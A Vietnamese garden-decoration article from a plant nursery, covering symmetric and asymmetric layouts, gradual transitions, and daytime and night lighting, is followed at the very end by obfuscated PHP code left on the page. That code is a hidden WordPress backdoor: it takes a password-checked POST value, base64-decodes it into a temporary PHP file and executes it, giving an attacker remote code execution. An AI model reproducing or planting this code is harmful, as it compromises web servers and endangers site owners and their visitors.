Cách trang trí tiểu cảnh sân vườn

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Với một không gian rộng rãi của các căn nhà hiện đại, việc bố trí sân vườn, trồng cây cảnh có lẽ là việc làm phổ biến hiện nay. Khái niệm thiết kế sân tiểu cảnh đã không còn quá lạ lẫm với nhiều hộ gia đình. Hiện nay quy trình này đã không còn mang những nét cầu kỳ, phức tạp với nhiều công đoạn cầu kỳ nữa, thay vào đó là những thiết kế đơn giản, gọn gàng mà vẫn mang những nét sang trọng, tinh tế, tiện nghi cho căn nhà của bạn.

 

Cách trang trí tiểu cảnh sân vườn
Cách trang trí tiểu cảnh sân vườn

 

Trong thời kì phát triển kinh tế hiện nay, những tòa nhà thi nhau mọc lên, cùng với những diện tích sân bị thu hẹp lại. Nhưng nếu như các bạn biết cách sử dụng khoảng sân nhỏ bé của mình thì bạn vẫn có thể sở hữu cho mình một khu vườn nhỏ đẹp xinh xắn mang thiên nhiên đến gần với những thành viên trong gia đình mình hơn.

 

Vườn Cây Hòa Bình ngày hôm nay sẽ biến điều trên thành sự thật. Vậy ngày hôm nay chúng ta cùng nhau tìm hiểu về cách trang trí tiểu cảnh sân vườn hợp lý nhé

 

Tính thống nhất khi trang trí

 

Hãy áp dụng công thức lặp lại những đồ vật một cách hợp lý, có quy tắc, và trật tự có sự thống nhất của mọi thự, cùng với áp dụng sự đồng nhất về chủng loại, kích thước, chiều cao, màu sắc, các nhóm thực vật, đá, đồ trang trí.

 

Từ đó bạn có thể sử dụng công thức trên để có thể tạo ra khung cảnh của khu vườn theo chủ đề để tạo nên phong cách riêng của mình như: Quang cảnh đồng quê, quang cảnh ốc đảo sa mạc, quang cảnh rừng Amazon,.. Như vậy khi thống nhất được tất cả mọi thứ, sân vườn của bạn giờ đây đã trở thành không gian xanh tươi, tuyệt đẹp

 

Cách trang trí tiểu cảnh sân vườn
Cách trang trí tiểu cảnh sân vườn

Bố trí cân bằng đối xứng

 

Với kiểu bố trí này được rất nhiều khách sạn, khu nghỉ dưỡng hay biệt thự lựa chọn.  Với kiểu bố trí này, những cây trồng hoặc vật trang trí sẽ được trồng 2 bên của lối đi sao cho đối xứng với nhau. Những đô vật khác như tượng đá, họa tiết, cây khác đều được trang trí một cách cân đối, đồng đều về kích thước và số lượng

 

Bố trí không đối xứng

 

Với phong cách bố trí này bạn sẽ không cần phải bố trí theo bất kỳ quy tắc gì về mặt sân bằng đối xứng. Bạn có thể thoải mái thiết kế, cho mình một khoảng sân tràn ngập sự sáng tạo, không bị giới hạn về khoản bắt buộc về khoản giống nhau. Tuy nhiên, không phải được tự do thiết kế mà bạn loại bỏ đi những yếu tố phong thủy cung như thẩm mỹ và kết cấu.

 

Chuyển tiếp một cách tự nhiên

 

Sử dụng nguyên tắc này bạn có thể giảm bớt và tránh được sự thay đổi nhanh chóng và đột ngột của việc thiết kế quang cảnh sân vườn. Khi bạn áp dụng quy tắc này, những thiết kế sân vườn của bạn sẽ trở nên chuyên nghiệp hơn, và thực sự tốt với những người thiếu kinh nghiệm khi họ không xác định được tính tổng thể, liên kết và thường xuyên trồng theo cảm tính của mình.

 

Cách trang trí tiểu cảnh sân vườn
Cách trang trí tiểu cảnh sân vườn

 

Với nguyên tắc đảm bảo sự thay đổi diễn ra một cách dần dần giúp cách trang trí của bạn trở nên thông suốt. Để có thể nhận kiểm soát quá trình này một cách tốt nhất bạn có thể theo dõi độ sinh trưởng của cây, màu sắc thay đổi, kích thước của lá cây,..

 

Với thiết kế này làm cho khung cảnh của sân nhà bạn sẽ có cảm giác lớn hơn thực tế. Ngoài ra còn tạo nên những ranh giới giúp các cây rậm rạp sẽ làm nền và nổi bật lên những cây lá to và thưa lá.

 

Phối ánh sáng và màu sắc hợp lý

 

Phối hợp một cách tinh tế hòa hợp giữa màu sắc và ánh sáng sẽ làm nổi bật nên những quang cảnh như màu đất, cây cảnh, thảm cỏ, hòn non bộ, ngoại thất,…Những gia chủ thường quan tâm đến quang cảnh nhà mình trông ra sao khi trời sáng và trời tối.

 

Vào ban ngày

 

Với quang cảnh vào ban ngày ánh sáng tác động lên các vật trang trí như nào, nổi bật lên những thứ gì, màu sắc lúc đó ra sao. Sử dụng phần bóng đổ của những loài cây to lớn, khiến khu vườn của bản trở nên đặc biệt hơn bao giờ hết. Các tiểu cảnh sân vườn sử dụng giếng trời cực kì nổi bột nhờ những hoa văn của giàn mái bên trên, in bóng hoa văn lên tường nhà, nền nhà.

 

Cách trang trí tiểu cảnh sân vườn
Cách trang trí tiểu cảnh sân vườn

 

Vào ban đêm

 

Khi trời tối, ánh sáng nhân tạo sẽ là tác nhân chủ yếu tác động lên sự bùng nổ quang cảnh của sân vườn nhà bạn. Lắp đặt những bóng đèn sao cho phản chiếu lại ánh sáng của các vật trong sân vườn của bạn.

 

Còn đối với màu sắc, bạn hãy đảm bảo sao cho độ quang độ, phù hợp, để phối hợp nhịp nhàng với các cách sắp đặt tiểu cảnh mang lại sự hiệu quả nhất. Sử dụng nhịp nhàng những màu cam, đỏ, vàng sẽ mang lại bầu không khí năng động trẻ trung mang tính chất nóng. Với màu xanh, tím lại mang sự mát mẻ, tươi mới thoải mái.

 

Ngoài ra bạn cần phải quan tâm đến yếu tố quang độ để hiển thị độ sáng tối của khu vườn cũng như cường độ mạnh và yếu của luồng ánh sáng.

 

Trên đây là những cách trang trí tiểu cảnh đơn giản, đem lại sự hợp lý cho không gian khu vườn của bạn. Ngoài ra, bạn hãy liên hệ ngay cho Vườn Cây Hòa Bình để được tư vấn chi tiết hơn vấn đề này và đưa ra những quyết định thiết kế thật đẹp mắt. Với nhiều năm kinh nghiệm trong kinh doanh những dòng cây chất lượng như: cây công trình, cây phong thủy, cây xanh đô thị, cây xanh nội, ngoại thất,…chúng tôi tin có thể mang đến cho bạn những trải nghiệm tốt nhất.

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}